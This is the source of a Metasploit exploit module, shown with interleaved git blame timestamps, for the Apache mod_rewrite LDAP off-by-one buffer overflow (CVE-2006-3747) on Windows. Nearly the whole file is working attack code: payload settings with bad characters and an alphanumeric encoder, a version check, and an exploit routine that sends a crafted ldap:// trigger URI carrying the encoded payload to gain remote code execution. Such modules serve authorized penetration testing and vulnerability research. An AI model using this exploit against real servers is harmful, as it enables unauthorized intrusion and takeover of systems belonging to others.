Files
metasploit-gs/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb
T

93 lines
2.7 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = GreatRanking
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
2013-09-24 13:03:16 -05:00
'Name' => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',
2013-08-30 16:28:54 -05:00
'Description' => %q{
This module exploits the mod_rewrite LDAP protocol scheme handling
flaw discovered by Mark Dowd, which produces an off-by-one overflow.
Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
This module requires REWRITEPATH to be set accurately. In addition,
the target must have 'RewriteEngine on' configured, with a specific
'RewriteRule' condition enabled to allow for exploitation.
2010-02-15 00:48:03 +00:00
2013-08-30 16:28:54 -05:00
The flaw affects multiple platforms, however this module currently
only supports Windows based installations.
},
2017-11-09 03:00:24 +11:00
'Author' => 'aushack',
2013-08-30 16:28:54 -05:00
'References' =>
[
[ 'CVE', '2006-3747' ],
[ 'OSVDB', '27588' ],
2013-08-30 16:28:54 -05:00
[ 'BID', '19204' ],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
[ 'EDB', '3680' ],
[ 'EDB', '3996' ],
[ 'EDB', '2237' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'AllowWin32SEH' => true
2013-08-30 16:28:54 -05:00
},
'Privileged' => true,
2013-09-24 15:14:11 -05:00
'Platform' => ['win'],
2013-08-30 16:28:54 -05:00
'Payload' =>
{
'Space' => 636,
'BadChars' => "\x00\x0a\x0d\x20",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'StackAdjustment' => -3500,
'DisableNops' => 'True',
},
'Targets' =>
[
2017-11-09 03:00:24 +11:00
[ 'Automatic', {} ], # aushack tested OK 20090310 win32
2013-08-30 16:28:54 -05:00
],
'DisclosureDate' => 'Jul 28 2006',
'DefaultTarget' => 0))
2013-08-30 16:28:54 -05:00
register_options(
[
OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
])
2013-08-30 16:28:54 -05:00
end
2010-02-15 00:48:03 +00:00
2013-08-30 16:28:54 -05:00
def check
res = send_request_raw({
'uri' => '/',
'version' => '1.1',
}, 2)
2013-08-30 16:28:54 -05:00
if (res.to_s =~ /Apache/) # This could be smarter.
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
2013-08-30 16:28:54 -05:00
end
2013-08-30 16:28:54 -05:00
def exploit
2010-02-15 00:48:03 +00:00
2013-08-30 16:28:54 -05:00
# On Linux Apache, it is possible to overwrite EIP by
2017-11-09 03:00:24 +11:00
# sending ldap://<buf> ... TODO aushack
2010-02-15 00:48:03 +00:00
2013-08-30 16:28:54 -05:00
trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
2013-08-30 16:28:54 -05:00
print_status("Sending payload.")
send_request_raw({
'uri' => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,
'version' => '1.0',
}, 2)
handler
end
2009-05-13 17:39:42 +00:00
end